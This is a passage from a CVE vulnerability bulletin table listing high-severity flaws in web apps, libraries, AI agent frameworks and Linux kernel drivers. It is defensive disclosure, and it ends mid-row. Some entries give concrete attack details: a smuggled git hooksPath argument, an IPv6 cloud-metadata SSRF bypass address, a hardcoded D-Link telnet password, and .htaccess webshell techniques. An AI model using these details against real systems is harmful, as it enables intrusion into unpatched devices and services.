| omnifaces--omnifaces | OmniFaces is a utility library for Faces. Prior to versions 1.14.2, 2.7.32, 3.14.16, 4.7.5, and 5.2.3, there is a server-side EL injection leading to Remote Code Execution (RCE). This affects applications that use CDNResourceHandler with a wildcard CDN mapping (e.g. libraryName:*=https://cdn.example.com/*). An attacker can craft a resource request URL containing an EL expression in the resource name, which is evaluated server-side. This issue has been patched in versions 1.14.2, 2.7.32, 3.14.16, 4.7.5, and 5.2.3. | 2026-05-08 | 8.1 | CVE-2026-41883 | https://github.com/omnifaces/omnifaces/security/advisories/GHSA-vp6r-9m58-5xv8 |
| th30d4y--OpenLearnX | OpenLearnX is an open-source, decentralized learning and assessment platform. Prior to version 2.0.3, a remote code execution (RCE) vulnerability was identified in the OpenLearnX code execution environment, allowing sandbox escape and arbitrary command execution. This issue has been patched in version 2.0.3. | 2026-05-08 | 8.8 | CVE-2026-41900 | https://github.com/th30d4y/OpenLearnX/security/advisories/GHSA-8h25-q488-4hxw https://github.com/th30d4y/OpenLearnX/commit/14765d7d1856d564747c55c5412e2f38feab079e https://github.com/th30d4y/OpenLearnX/releases/tag/v2.0.3-security-fix |
| givanz--Vvveb | Vvveb before version 1.0.8.2 contains an authenticated remote code execution vulnerability in the admin code editor that allows low-privilege authenticated users to execute arbitrary code by exploiting insufficient file extension restrictions. Attackers with editor, author, contributor, or site_admin roles can write a malicious .htaccess file to map arbitrary extensions to the PHP handler, then upload PHP code with that extension to achieve unauthenticated remote code execution when the file is accessed via HTTP. | 2026-05-06 | 8.8 | CVE-2026-41934 | https://github.com/givanz/Vvveb/releases/tag/1.0.8.2 https://github.com/givanz/Vvveb/security/advisories/GHSA-vfjj-gcvv-w248 https://github.com/givanz/Vvveb/commit/1196561276a3f49da5a714fef89ac9a6c6f9e33b https://www.vulncheck.com/advisories/vvveb-authenticated-rce-via-code-editor |
| givanz--Vvveb | Vvveb before version 1.0.8.2 contains an XML external entity (XXE) injection vulnerability in the admin Tools/Import feature that allows authenticated site_admin users to read arbitrary files and modify database records. Attackers can exploit the XML parser configuration in system/import/xml.php to inject file:// or php://filter entity references that are resolved and persisted into the application database, enabling arbitrary file disclosure and administrator password hash overwriting for privilege escalation. | 2026-05-06 | 8.1 | CVE-2026-41936 | https://github.com/givanz/Vvveb/releases/tag/1.0.8.2 https://github.com/givanz/Vvveb/security/advisories/GHSA-rfxr-4xpm-wrp7 https://github.com/givanz/Vvveb/commit/86f7128a18edebe0ff47e3855558467eb0ef9106 https://www.vulncheck.com/advisories/vvveb-xml-external-entity-injection-via-import |
| givanz--Vvveb | Vvveb before version 1.0.8.2 contains an unrestricted file upload vulnerability in the media upload handler that allows authenticated users with media-upload permissions to bypass extension restrictions by uploading a .htaccess file to map .phtml extensions to the PHP handler. Attackers can upload a .phtml file containing arbitrary PHP code and trigger execution by sending an unauthenticated HTTP GET request to the uploaded file, resulting in remote code execution with web server privileges. | 2026-05-06 | 8.8 | CVE-2026-41938 | https://github.com/givanz/Vvveb/releases/tag/1.0.8.2 https://github.com/givanz/Vvveb/security/advisories/GHSA-wwmv-4g9g-p48g https://github.com/givanz/Vvveb/commit/54a9e846fb94192f1b31ae81d81d25c874662e6a https://www.vulncheck.com/advisories/vvveb-rce-via-media-upload-handler |
| inngest--inngest-js | Inngest is a platform for running event-driven and scheduled background functions with queueing, retries, and step orchestration. Versions 3.22.0 through 3.53.1 contain a vulnerability that allows unauthenticated remote attackers to exfiltrate environment variables from the host process via the serve() HTTP handler. The serve() handler implements GET, POST, and PUT methods. Requests using PATCH, OPTIONS, or DELETE fall through to a generic handler that returns diagnostic information. A change introduced in v3.22.0 caused this diagnostic response to include the contents of process.env, exposing any secrets, API keys, or credentials present in the environment. An application is vulnerable if its serve() endpoint is reachable via PATCH, OPTIONS, or DELETE requests, which is common in setups like Next.js Pages Router or Express's app.use(...). Not affected are Next.js App Router handlers that export only GET, POST, and PUT, and applications using the connect worker method. This issue has been fixed in version 3.54.0. To work around this issue if upgrading is not immediately possible, restrict the serve() endpoint at the framework or reverse-proxy layer to accept only GET, POST, and PUT. The Inngest serve() endpoint does not require any other HTTP methods. | 2026-05-07 | 8.6 | CVE-2026-42047 | https://github.com/inngest/inngest-js/security/advisories/GHSA-2jf5-6wwv-vhxx https://github.com/inngest/inngest-js/releases/tag/inngest%403.54.1 |
| EvoMap--evolver | Evolver is a GEP-powered self-evolving engine for AI agents. Prior to version 1.69.3, a path traversal vulnerability in the skill download (fetch) command allows attackers to write files to arbitrary locations on the filesystem. The --out= flag accepts user-provided paths without validation, enabling directory traversal attacks that can overwrite critical system files or create files in sensitive locations. This issue has been patched in version 1.69.3. | 2026-05-04 | 8.1 | CVE-2026-42075 | https://github.com/EvoMap/evolver/security/advisories/GHSA-r466-rxw4-3j9j https://github.com/EvoMap/evolver/releases/tag/v1.69.3 |
| icip-cas--PPTAgent | PPTAgent is an agentic framework for reflective PowerPoint generation. Prior to commit 418491a, PPTAgent is vulnerable to arbitrary code execution via Python eval() of LLM-generated code with builtins in scope. This issue has been patched via commit 418491a. | 2026-05-04 | 8.6 | CVE-2026-42079 | https://github.com/icip-cas/PPTAgent/security/advisories/GHSA-89g2-xw5c-v95p https://github.com/icip-cas/PPTAgent/commit/418491a9a1c02d9d93194b5973bb58df35cf9d00 |
| OpenC3--cosmos | OpenC3 COSMOS provides the functionality needed to send commands to and receive data from one or more embedded systems. Prior to versions 6.10.5 and 7.0.0-rc3, the OpenC3 password change functionality allows a user to change their password without providing the old password, by accepting a valid session token instead. In assumed-breach scenarios, this behaviour can be exploited by an attacker who has already obtained a valid session token to gain persistence in the hijacked account (including admin accounts) and prevent legitimate users from accessing the account. This issue has been patched in versions 6.10.5 and 7.0.0-rc3. | 2026-05-04 | 8.1 | CVE-2026-42084 | https://github.com/OpenC3/cosmos/security/advisories/GHSA-wgx6-g857-jjf7 https://github.com/OpenC3/cosmos/commit/2e623714e3426d5ae81b6f8239d4a2a6937ef776 https://github.com/OpenC3/cosmos/releases/tag/v6.10.5 https://github.com/OpenC3/cosmos/releases/tag/v7.0.0-rc3 |
| avo-hq--avo | Avo is a framework to create admin panels for Ruby on Rails apps. Prior to version 3.31.2, a broken access control vulnerability was identified in the ActionsController of the Avo framework. Due to insecure action lookup logic, an authenticated user can execute any Action class (descendants of Avo::BaseAction) on any resource, even if the action is not registered for that specific resource. This leads to Privilege Escalation and unauthorized data manipulation across the entire application. This issue has been patched in version 3.31.2. | 2026-05-08 | 8.8 | CVE-2026-42205 | https://github.com/avo-hq/avo/security/advisories/GHSA-qc5p-3mg5-9fh8 https://github.com/avo-hq/avo/releases/tag/v3.31.2 |
| gitpython-developers--GitPython | GitPython is a Python library used to interact with Git repositories. From version 3.1.30 to before version 3.1.47, GitPython blocks dangerous Git options such as --upload-pack and --receive-pack by default, but the equivalent Python kwargs upload_pack and receive_pack bypass that check. If an application passes attacker-controlled kwargs into Repo.clone_from(), Remote.fetch(), Remote.pull(), or Remote.push(), this leads to arbitrary command execution even when allow_unsafe_options is left at its default value of False. This issue has been patched in version 3.1.47. | 2026-05-07 | 8.8 | CVE-2026-42215 | https://github.com/gitpython-developers/GitPython/security/advisories/GHSA-rpm5-65cw-6hj4 https://github.com/gitpython-developers/GitPython/releases/tag/3.1.47 |
| 0xJacky--nginx-ui | Nginx UI is a web user interface for the Nginx web server. From version 2.0.0 to before version 2.3.8, an unauthenticated network attacker can claim the initial administrator account on a fresh nginx-ui instance during the first-run setup window. The public /api/install endpoint is reachable without authentication, and the request-encryption flow only protects payload confidentiality in transit; it does not authenticate who is allowed to perform installation. A remote attacker who reaches the service before the legitimate operator can set the admin email, username, and password, causing permanent initial-instance takeover. This issue has been patched in version 2.3.8. | 2026-05-04 | 8.1 | CVE-2026-42221 | https://github.com/0xJacky/nginx-ui/security/advisories/GHSA-h27v-ph7w-m9fp https://github.com/0xJacky/nginx-ui/releases/tag/v2.3.8 |
| 0xJacky--nginx-ui | Nginx UI is a web user interface for the Nginx web server. In version 2.3.5, an unauthenticated bootstrap takeover exists in nginx-ui during the initial installation window exposed by POST /api/install. At time of publication no public patches are available. | 2026-05-04 | 8.1 | CVE-2026-42222 | https://github.com/0xJacky/nginx-ui/security/advisories/GHSA-mxqh-q9h6-v8pq |
| Budibase--budibase | Budibase is an open-source low-code platform. Prior to version 3.35.10, the budibase:auth cookie containing the JWT session token is set with httpOnly: false at packages/backend-core/src/utils/utils.ts:218. JavaScript can read this cookie via document.cookie. This means every XSS becomes a full account takeover - the attacker steals the JWT and has persistent access to the victim's account. The cookie also lacks secure: true (sent over plaintext HTTP) and sameSite attribute. This issue has been patched in version 3.35.10. | 2026-05-07 | 8.1 | CVE-2026-42239 | https://github.com/Budibase/budibase/security/advisories/GHSA-4f9j-vr4p-642r https://github.com/Budibase/budibase/releases/tag/3.35.10 |
| openziti--zrok | zrok is software for sharing web services, files, and network resources. Prior to version 2.0.2, the zrok WebDAV drive backend (davServer.Dir) restricts path traversal through lexical normalization but does not prevent symlink following. When a symbolic link inside the shared DriveRoot points to a location outside that root, remote WebDAV consumers can read files and, on shares without OS-level permission restrictions, write or overwrite files anywhere on the host filesystem accessible to the zrok process. This issue has been patched in version 2.0.2. | 2026-05-08 | 8.7 | CVE-2026-42275 | https://github.com/openziti/zrok/security/advisories/GHSA-74m3-9qvm-rp9h https://github.com/openziti/zrok/commit/459bcfc1e121decae1b1d11c37ad94e4ed5bbf2e https://github.com/openziti/zrok/releases/tag/v2.0.2 |
| gitpython-developers--GitPython | GitPython is a Python library used to interact with Git repositories. Prior to version 3.1.47, _clone() validates multi_options as the original list, then executes shlex.split(" ".join(multi_options)). A string like "--branch main --config core.hooksPath=/x" passes validation (it starts with --branch), but after the split it becomes ["--branch", "main", "--config", "core.hooksPath=/x"]. Git applies the config and executes attacker hooks during clone. This issue has been patched in version 3.1.47. | 2026-05-07 | 8.1 | CVE-2026-42284 | https://github.com/gitpython-developers/GitPython/security/advisories/GHSA-x2qx-6953-8485 https://github.com/gitpython-developers/GitPython/releases/tag/3.1.47 |
| argoproj--argo-workflows | Argo Workflows is an open source container-native workflow engine for orchestrating parallel jobs on Kubernetes. Prior to versions 3.7.14 and 4.0.5, a user with create Workflow permission can bypass templateReferencing: Strict to get host network access, switch service accounts, override pod security context, add tolerations to schedule on control-plane nodes, or enable SA token mounting. This defeats the stated purpose of the feature. The practical impact depends on what Kubernetes-level controls are in place. Clusters with PodSecurity admission or OPA/Gatekeeper would independently block some of these (like hostNetwork). Clusters that rely on Argo's Strict mode as the primary enforcement layer are fully exposed. This issue has been patched in versions 3.7.14 and 4.0.5. | 2026-05-09 | 8.1 | CVE-2026-42296 | https://github.com/argoproj/argo-workflows/security/advisories/GHSA-3775-99mw-8rp4 https://github.com/argoproj/argo-workflows/commit/534f4ff1cbd86908e8ff76d97d553ad5a49a950d https://github.com/argoproj/argo-workflows/releases/tag/v3.7.14 https://github.com/argoproj/argo-workflows/releases/tag/v4.0.5 |
| geopython--pygeoapi | pygeoapi is a Python server implementation of the OGC API suite of standards. From version 0.23.0 to before version 0.23.3, OGC API process execution requests can use the subscriber object to make requests to internal HTTP services. This issue has been patched in version 0.23.3. | 2026-05-08 | 8.6 | CVE-2026-42352 | https://github.com/geopython/pygeoapi/security/advisories/GHSA-jgvc-94c8-3chc https://github.com/geopython/pygeoapi/commit/3a63f5b0cc6275e3ae0edb47726b13a43cdd90ef https://github.com/geopython/pygeoapi/releases/tag/0.23.3 |
| i18next--i18next-http-middleware | i18next-http-middleware is a middleware to be used with Node.js web frameworks like express or Fastify and also for Deno. Prior to version 3.9.3, i18next-http-middleware passes the user-controlled lng and ns values from getResourcesHandler directly into i18next.services.backendConnector.load(languages, namespaces, …) without any sanitization. Depending on which backend is configured, the unvalidated path segments enable either path traversal or SSRF. This issue has been patched in version 3.9.3. | 2026-05-08 | 8.2 | CVE-2026-42353 | https://github.com/i18next/i18next-http-middleware/security/advisories/GHSA-jfgf-83c5-2c4m |
| GeoVision Inc.--GV-LPC2011/LPC2211 | A guessable session cookie vulnerability exists in the Web Interface functionality of GeoVision LPC2011/LPC2211 1.10. A specially crafted series of HTTP requests can lead to an authentication bypass. An attacker can brute-force session cookies to trigger this vulnerability. | 2026-05-04 | 8.6 | CVE-2026-42365 | https://www.geovision.com.tw/cyber_security.php https://talosintelligence.com/vulnerability_reports/ |
| D-Link--DIR-605L Firmware | D-Link DIR-605L Hardware Revision A1 (End-of-Life, EOL) contains a hardcoded telnet backdoor. The device starts a telnet daemon at boot via /bin/telnetd.sh with the username "Alphanetworks" and the static password "wrgn35_dlwbr_dir605l" read from /etc/alpha_config/image_sign. The custom telnetd binary accepts a -u user:password flag, and the custom login binary uses strcmp() to validate credentials. Successful authentication grants an unauthenticated attacker on the local network a root shell with full administrative control. The device has reached End-of-Life (EOL) and will not receive patches. | 2026-05-04 | 8.8 | CVE-2026-42372 | D-Link DIR-605L Support Page |
| OpenClaw--OpenClaw | OpenClaw versions 2026.4.5 before 2026.4.10 contain a sandbox escape vulnerability allowing sandboxed agents to override exec routing by specifying host=node. Attackers can bypass sandbox boundaries and route execution to remote nodes instead of intended sandbox paths. | 2026-05-05 | 8.8 | CVE-2026-42434 | GitHub Security Advisory (GHSA-736r-jwj6-4w23) Patch Commit VulnCheck Advisory: OpenClaw 2026.4.5 < 2026.4.10 - Sandbox Escape via host Parameter Override in Exec Routing |
| OpenClaw--OpenClaw | OpenClaw versions from 2026.2.22 before 2026.4.12 contain an insufficient shell-wrapper detection vulnerability allowing attackers to inject environment variable assignments at the argv level. Attackers can bypass exec preflight handling to manipulate high-risk shell variables like SHELLOPTS and PS4, affecting execution semantics and security controls. | 2026-05-05 | 8.8 | CVE-2026-42435 | GitHub Security Advisory (GHSA-j6c7-3h5x-99g9) Patch Commit VulnCheck Advisory: OpenClaw 2026.2.22 < 2026.4.12 - Shell-Wrapper Detection Bypass via Environment Variable Assignment Injection |
| OpenClaw--OpenClaw | OpenClaw before 2026.4.10 contains a server-side request forgery policy bypass vulnerability in the browser tabs action select and close routes. Attackers can bypass configured browser SSRF policy protections by exploiting the /tabs/action endpoint to perform unauthorized tab navigation operations. | 2026-05-05 | 8.5 | CVE-2026-42439 | GitHub Security Advisory (GHSA-rj2p-j66c-mgqh) Patch Commit VulnCheck Advisory: OpenClaw < 2026.4.10 - SSRF Policy Bypass in Browser Tabs Action Routes |
| czlonkowski--n8n-mcp | n8n-MCP is an MCP server that provides AI assistants access to n8n node documentation, properties, and operations. In versions 2.47.4 through 2.47.13, in the SDK embedder path (N8NDocumentationMCPServer constructor, getN8nApiClient(), and validateInstanceContext()), the synchronous URL validator SSRFProtection.validateUrlSync() had no IPv6 checks. IPv4-mapped IPv6 addresses such as http://[::ffff:169.254.169.254] bypassed the cloud-metadata, localhost, and private-IP range checks. An attacker able to supply an n8nApiUrl value could cause the server to issue HTTP requests to cloud metadata endpoints, RFC1918 private networks, or localhost services. Response bodies are returned to the caller (non-blind SSRF), and the n8nApiKey is forwarded in the x-n8n-api-key header to the attacker-controlled target. Projects with deployments embedding n8n-mcp as an SDK using N8NDocumentationMCPServer or N8NMCPEngine with user-supplied InstanceContext are affected. The first-party HTTP server deployment was not primarily affected: it has a second async validator (validateWebhookUrl) that catches IPv6 addresses. This issue has been fixed in version 2.47.14. If users are unable to upgrade immediately, as a workaround they can validate URLs before passing them to the SDK, restrict egress at the network layer, and reject user-controlled n8nApiUrl values. | 2026-05-07 | 8.5 | CVE-2026-42449 | https://github.com/czlonkowski/n8n-mcp/security/advisories/GHSA-56c3-vfp2-5qqj https://github.com/czlonkowski/n8n-mcp/commit/9639f757853149f0cb16663cc8b6b6468f27a25f |
| Termix-SSH--Termix | Termix is a web-based server management platform with SSH terminal, tunneling, and file editing capabilities. Prior to version 2.1.0, /users/login issues a temporary JWT (temp_token) for TOTP-enabled accounts. That token carries a pendingTOTP state and should only be valid for the second-factor flow. However, the auth middleware accepts this token on regular authenticated endpoints. This effectively turns 2FA into single-factor (password) for impacted accounts. This issue has been patched in version 2.1.0. | 2026-05-08 | 8.1 | CVE-2026-42452 | https://github.com/Termix-SSH/Termix/security/advisories/GHSA-vx59-rf9w-9jv8 https://github.com/Termix-SSH/Termix/releases/tag/release-2.1.0-tag |
| gitroomhq--postiz-app | Postiz is an AI social media scheduling tool. From version 2.21.6 to before version 2.21.7, any authenticated user who can create a post can store arbitrary HTML in post content by tampering with their own save request and then send the public preview link /p/<postId>?share=true to another user. The preview page renders that stored HTML with dangerouslySetInnerHTML on the main application origin. This issue has been patched in version 2.21.7. | 2026-05-08 | 8.9 | CVE-2026-42556 | https://github.com/gitroomhq/postiz-app/security/advisories/GHSA-hhxq-3wg7-4rj8 https://github.com/gitroomhq/postiz-app/releases/tag/v2.21.7 |
| alextselegidis--plainpad | Plainpad is a self-hosted note-taking app. Prior to version 1.1.1, Plainpad allows a low-privilege authenticated user to self-escalate to administrator by submitting admin=true in PUT /api.php/v1/users/{id}. The endpoint directly persists the admin attribute from user input, and the escalated account can immediately access admin-only routes. This issue has been patched in version 1.1.1. | 2026-05-09 | 8.3 | CVE-2026-42562 | https://github.com/alextselegidis/plainpad/security/advisories/GHSA-pvfv-wvpm-q6f6 https://github.com/alextselegidis/plainpad/issues/138 https://github.com/alextselegidis/plainpad/commit/9216a876d27b22c3d9259551636d803f7cb075fc https://github.com/alextselegidis/plainpad/releases/tag/1.1.1 |
| AzuraCast--AzuraCast | AzuraCast is a self-hosted, all-in-one web radio management suite. Prior to version 0.23.6, the currentDirectory request parameter in the Flow.js media upload endpoint (POST /api/station/{station_id}/files/upload) is not sanitized for path traversal sequences. When combined with a local filesystem storage backend (the default), an authenticated user with media management permissions can write arbitrary files outside the station's media storage directory, achieving remote code execution by writing a PHP webshell to the web root. This issue has been patched in version 0.23.6. | 2026-05-09 | 8.8 | CVE-2026-42605 | https://github.com/AzuraCast/AzuraCast/security/advisories/GHSA-vp2f-cqqp-478j https://github.com/AzuraCast/AzuraCast/commit/18c793b4427eb49e67a2fea99a89f1c9d9dd808d https://github.com/AzuraCast/AzuraCast/releases/tag/0.23.6 |
| AzuraCast--AzuraCast | AzuraCast is a self-hosted, all-in-one web radio management suite. Prior to version 0.23.6, the ApplyXForwarded middleware unconditionally trusts the client-supplied X-Forwarded-Host HTTP header with no trusted proxy allowlist. An unauthenticated attacker can poison the password reset URL sent to any user by injecting this header when triggering the forgot-password flow. When the victim clicks the poisoned link, their reset token is exfiltrated to the attacker's server. The attacker then uses the token on the real instance to reset the victim's password and destroy their 2FA configuration, achieving full account takeover. This issue has been patched in version 0.23.6. | 2026-05-09 | 8.1 | CVE-2026-42606 | https://github.com/AzuraCast/AzuraCast/security/advisories/GHSA-gv7r-3mr9-h5x8 https://github.com/AzuraCast/AzuraCast/commit/7c622a18b451533de317e53862b1f84acf4efd85 https://github.com/AzuraCast/AzuraCast/releases/tag/0.23.6 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: wifi: brcmfmac: validate bsscfg indices in IF events brcmf_fweh_handle_if_event() validates the firmware-provided interface index before it touches drvr->iflist[], but it still uses the raw bsscfgidx field as an array index without a matching range check. Reject IF events whose bsscfg index does not fit in drvr->iflist[] before indexing the interface array. [add missing wifi prefix] | 2026-05-06 | 8.8 | CVE-2026-43110 | https://git.kernel.org/stable/c/3ec7437e9d11374105c2c4e47ae671537729d7e6 https://git.kernel.org/stable/c/9fca68c2512a362cad258e4df12a307bb2ee4b8e https://git.kernel.org/stable/c/1ae1e1caa428844e481231f6dbe9b4f475f1d52d https://git.kernel.org/stable/c/b427c2b05222db36d32ee141609de6128e9091bb https://git.kernel.org/stable/c/304950a467d83678bd0b0f46331882e2ac23b12d |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: fs/smb/client: fix out-of-bounds read in cifs_sanitize_prepath When cifs_sanitize_prepath is called with an empty string or a string containing only delimiters (e.g., "/"), the current logic attempts to check *(cursor2 - 1) before cursor2 has advanced. This results in an out-of-bounds read. This patch adds an early exit check after stripping prepended delimiters. If no path content remains, the function returns NULL. The bug was identified via manual audit and verified using a standalone test case compiled with AddressSanitizer, which triggered a SEGV on affected inputs. | 2026-05-06 | 8.8 | CVE-2026-43112 | https://git.kernel.org/stable/c/5d4fe469fe7dbff7d874c196bb680a82f2625d95 https://git.kernel.org/stable/c/2d29214448ec0f4e7e18bb1c14dd4a6c07f1c439 https://git.kernel.org/stable/c/86f9c23e0814cfdffda9eedf0c591c51ba209010 https://git.kernel.org/stable/c/49b1ce6d7cfb6c5a49f68bf5ccfcfb6ba14e63c3 https://git.kernel.org/stable/c/78ec5bf2f589ec7fd8f169394bfeca541b077317 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: wifi: wl1251: validate packet IDs before indexing tx_frames wl1251_tx_packet_cb() uses the firmware completion ID directly to index the fixed 16-entry wl->tx_frames[] array. The ID is a raw u8 from the completion block, and the callback does not currently verify that it fits the array before dereferencing it. Reject completion IDs that fall outside wl->tx_frames[] and keep the existing NULL check in the same guard. This keeps the fix local to the trust boundary and avoids touching the rest of the completion flow. | 2026-05-06 | 8.8 | CVE-2026-43113 | https://git.kernel.org/stable/c/b6ba1eacf276063ebeefbbae8056043c24f2efaf https://git.kernel.org/stable/c/df15adc692a802636dd3f258fc7cca8bf7a0ed9a https://git.kernel.org/stable/c/8d7465be5163a923ee5d7459719ef5a021c1584a https://git.kernel.org/stable/c/26ee518695c484f75e3606d631278e84bd24ae02 https://git.kernel.org/stable/c/0fd56fad9c56356e7fa7a7c52e7ecbf807a44eb0 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: Bluetooth: L2CAP: Fix missing key size check for L2CAP_LE_CONN_REQ This adds a check for encryption key size upon receiving L2CAP_LE_CONN_REQ which is required by L2CAP/LE/CFC/BV-15-C which expects L2CAP_CR_LE_BAD_KEY_SIZE. | 2026-05-06 | 8.1 | CVE-2026-43134 | https://git.kernel.org/stable/c/335071c0c3637064ec250481f589075db44fe4e6 https://git.kernel.org/stable/c/fa6ad76fa8623c0a50d529cd5726fa5d819a3be4 https://git.kernel.org/stable/c/9118601ff90b79e8df3c0c98f48ae00c1b02ecef https://git.kernel.org/stable/c/481ea39b342c347b6ac029f3d418486280be4e45 https://git.kernel.org/stable/c/ec91078e132179b04e0c3906b599816c056ceaad https://git.kernel.org/stable/c/96581749c7c14fbec32c35728520867929600041 https://git.kernel.org/stable/c/8dd43f9a9323f9c01bc8246da8d81a4c783c9e97 https://git.kernel.org/stable/c/138d7eca445ef37a0333425d269ee59900ca1104 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: xfrm6: fix uninitialized saddr in xfrm6_get_saddr() xfrm6_get_saddr() does not check the return value of ipv6_dev_get_saddr(). When ipv6_dev_get_saddr() fails to find a suitable source address (returns -EADDRNOTAVAIL), saddr->in6 is left uninitialized, but xfrm6_get_saddr() still returns 0 (success). This causes the caller xfrm_tmpl_resolve_one() to use the uninitialized address in xfrm_state_find(), triggering KMSAN warning: ===================================================== BUG: KMSAN: uninit-value in xfrm_state_find+0x2424/0xa940 xfrm_state_find+0x2424/0xa940 xfrm_resolve_and_create_bundle+0x906/0x5a20 xfrm_lookup_with_ifid+0xcc0/0x3770 xfrm_lookup_route+0x63/0x2b0 ip_route_output_flow+0x1ce/0x270 udp_sendmsg+0x2ce1/0x3400 inet_sendmsg+0x1ef/0x2a0 __sock_sendmsg+0x278/0x3d0 __sys_sendto+0x593/0x720 __x64_sys_sendto+0x130/0x200 x64_sys_call+0x332b/0x3e70 do_syscall_64+0xd3/0xf80 entry_SYSCALL_64_after_hwframe+0x77/0x7f Local variable tmp.i.i created at: xfrm_resolve_and_create_bundle+0x3e3/0x5a20 xfrm_lookup_with_ifid+0xcc0/0x3770 ===================================================== Fix by checking the return value of ipv6_dev_get_saddr() and propagating the error. | 2026-05-06 | 8.6 | CVE-2026-43139 | https://git.kernel.org/stable/c/4f28141786e1fe884ce42a5197ba9beed540f0ea https://git.kernel.org/stable/c/6535867673bf301d52aa00593a4d1d18cc3922fa https://git.kernel.org/stable/c/eb2ee15290af14c60b45cf2b73f5687d1d077d9b https://git.kernel.org/stable/c/719918fc88df6da023dfff370cd965151a5afd7f https://git.kernel.org/stable/c/dc0abce055134cb83b0d981d31ceb20dda419787 https://git.kernel.org/stable/c/c7221e7bd8fc2ef38a0b27be580d9d202281306b https://git.kernel.org/stable/c/3dcd1664ac15eee6a690daec7c4ffc59190406f7 https://git.kernel.org/stable/c/1799d8abeabc68ec05679292aaf6cba93b343c05 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: xfs: fix freemap adjustments when adding xattrs to leaf blocks xfs/592 and xfs/794 both trip this assertion in the leaf block freemap adjustment code after ~20 minutes of running on my test VMs: ASSERT(ichdr->firstused >= ichdr->count * sizeof(xfs_attr_leaf_entry_t) + xfs_attr3_leaf_hdr_size(leaf)); Upon enabling quite a lot more debugging code, I narrowed this down to fsstress trying to set a local extended attribute with namelen=3 and valuelen=71. This results in an entry size of 80 bytes. At the start of xfs_attr3_leaf_add_work, the freemap looks like this: i 0 base 448 size 0 rhs 448 count 46 i 1 base 388 size 132 rhs 448 count 46 i 2 base 2120 size 4 rhs 448 count 46 firstused = 520 where "rhs" is the first byte past the end of the leaf entry array. This is inconsistent -- the entries array ends at byte 448, but freemap[1] says there's free space starting at byte 388! By the end of the function, the freemap is in worse shape: i 0 base 456 size 0 rhs 456 count 47 i 1 base 388 size 52 rhs 456 count 47 i 2 base 2120 size 4 rhs 456 count 47 firstused = 440 Important note: 388 is not aligned with the entries array element size of 8 bytes. Based on the incorrect freemap, the name area starts at byte 440, which is below the end of the entries array! That's why the assertion triggers and the filesystem shuts down. How did we end up here? First, recall from the previous patch that the freemap array in an xattr leaf block is not intended to be a comprehensive map of all free space in the leaf block. In other words, it's perfectly legal to have a leaf block with: * 376 bytes in use by the entries array * freemap[0] has [base = 376, size = 8] * freemap[1] has [base = 388, size = 1500] * the space between 376 and 388 is free, but the freemap stopped tracking that some time ago If we add one xattr, the entries array grows to 384 bytes, and freemap[0] becomes [base = 384, size = 0]. So far, so good. But if we add a second xattr, the entries array grows to 392 bytes, and freemap[0] gets pushed up to [base = 392, size = 0]. This is bad, because freemap[1] hasn't been updated, and now the entries array and the free space claim the same space. The fix here is to adjust all freemap entries so that none of them collide with the entries array. Note that this fix relies on commit 2a2b5932db6758 ("xfs: fix attr leaf header freemap.size underflow") and the previous patch that resets zero length freemap entries to have base = 0. | 2026-05-06 | 8.8 | CVE-2026-43158 | https://git.kernel.org/stable/c/d08976725355b9d54d8332fce223fa281cc304a5 https://git.kernel.org/stable/c/6a8737afbccc340e718e0b22577312826390be8b https://git.kernel.org/stable/c/a396b3d73d51355e50acdb403ba9c4cae4c1174e https://git.kernel.org/stable/c/38613c01f69e1e77e6b8acab1e8ac665d01c2f15 https://git.kernel.org/stable/c/ef42a8766ff3fdf51cf72fb36d0859c09d134478 https://git.kernel.org/stable/c/43f3b18679615a93bd848afde3602ba160637a46 https://git.kernel.org/stable/c/24ce71852f2cee6581e2cbebc15489ed52bf63b7 https://git.kernel.org/stable/c/3eefc0c2b78444b64feeb3783c017d6adc3cd3ce |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: wifi: iwlwifi: fix 22000 series SMEM parsing If the firmware were to report three LMACs (which doesn't exist in hardware) then using "fwrt->smem_cfg.lmac[2]" is an overrun of the array. Reject such and use IWL_FW_CHECK instead of WARN_ON in this function. | 2026-05-06 | 8.8 | CVE-2026-43172 | https://git.kernel.org/stable/c/1d49a42717bdc8de77eabeb5b7d3e88d141ffea9 https://git.kernel.org/stable/c/2b4b1510aaaf5b9fb57327ecffc20c055f61f205 https://git.kernel.org/stable/c/58192b9ce09b0f0f86e2036683bd542130b91a98 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: wifi: rtw89: pci: validate release report content before using for RTL8922DE The commit 957eda596c76 ("wifi: rtw89: pci: validate sequence number of TX release report") does validation on existing chips, which somehow a release report of SKB becomes malformed. As no clear cause found, add rules ahead for RTL8922DE to avoid crash if it happens. | 2026-05-06 | 8.8 | CVE-2026-43176 | https://git.kernel.org/stable/c/ebeaa3b24ba568ff8505165f954dba15cc53e4b3 https://git.kernel.org/stable/c/3e8a88b5e8b3506d9c5e031a65ba65ce9a0683a3 https://git.kernel.org/stable/c/5f93d611b33a05bd03d6843c8efe8cb6a1992620 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: xfs: delete attr leaf freemap entries when empty Back in commit 2a2b5932db6758 ("xfs: fix attr leaf header freemap.size underflow"), Brian Foster observed that it's possible for a small freemap at the end of the end of the xattr entries array to experience a size underflow when subtracting the space consumed by an expansion of the entries array. There are only three freemap entries, which means that it is not a complete index of all free space in the leaf block. This code can leave behind a zero-length freemap entry with a nonzero base. Subsequent setxattr operations can increase the base up to the point that it overlaps with another freemap entry. This isn't in and of itself a problem because the code in _leaf_add that finds free space ignores any freemap entry with zero size. However, there's another bug in the freemap update code in _leaf_add, which is that it fails to update a freemap entry that begins midway through the xattr entry that was just appended to the array. That can result in the freemap containing two entries with the same base but different sizes (0 for the "pushed-up" entry, nonzero for the entry that's actually tracking free space). A subsequent _leaf_add can then allocate xattr namevalue entries on top of the entries array, leading to data loss. But fixing that is for later. For now, eliminate the possibility of confusion by zeroing out the base of any freemap entry that has zero size. Because the freemap is not intended to be a complete index of free space, a subsequent failure to find any free space for a new xattr will trigger block compaction, which regenerates the freemap. It looks like this bug has been in the codebase for quite a long time. | 2026-05-06 | 8.8 | CVE-2026-43187 | https://git.kernel.org/stable/c/f3c0d1fc1eadbb4adbee5ab7757d41d35f48325b 